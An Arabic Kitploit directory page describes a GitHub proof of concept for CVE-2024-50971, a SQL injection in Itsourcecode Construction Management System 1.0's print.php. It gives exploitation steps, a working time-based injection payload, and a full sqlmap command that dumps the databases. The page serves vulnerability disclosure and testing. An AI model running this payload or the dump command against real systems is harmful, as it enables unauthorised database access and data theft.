Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50971 — إثبات مفهوم لثغرة SQL injection في نظام Itsourcecode لإدارة الإنشاءات الإصدار 1.0، مع خطوات الاستغلال والتكامل مع SQLMap لاستخراج قاعدة البيانات. | Kitploit
أدوات/GitHubGitHub/akhlak2511/cve-2024-50971
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

إثبات مفهوم لثغرة SQL injection في نظام Itsourcecode لإدارة الإنشاءات الإصدار 1.0، مع خطوات الاستغلال والتكامل مع SQLMap لاستخراج قاعدة البيانات.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50971

الوصف

تسمح ثغرة حقن SQL في ملف print.php الخاص بنظام إدارة الإنشاءات Itsourcecode الإصدار 1.0 للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر المعامل map_id.

نوع الثغرة

حقن SQL

البائع

Itsourcecode

قاعدة الكود المتأثر:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

المكون المتأثر:

نظام إدارة الإنشاءات Itsourcecode v1.0 معرض لحقن SQL من خلال المعامل map_id في صفحة print.php.

نواقل الهجوم:

  1. قم بإعداد التطبيق محليًا، وسجل حسابًا، ثم سجل الدخول باستخدام بيانات المشرف admin:admin
  2. انتقل إلى عنوان URL التالي في متصفحك: http://localhost/monitoring_system/print.php?map_id=67
  3. حقن حمولة SQL: قم بتعديل المعامل map_id في عنوان URL لإدراج حمولة حقن SQL زمنية. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  4. لاحظ استجابة التطبيق: يجب أن يستغرق تحميل الصفحة وقتًا أطول بشكل ملحوظ (15 ثانية) إذا كان الحقن ناجحًا، مما يؤكد أن المعامل map_id معرض لحقن SQL.
  5. استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي: sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast

المراجع:

  1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
  2. https://owasp.org/www-community/attacks/SQL_Injection
تنزيل الأداة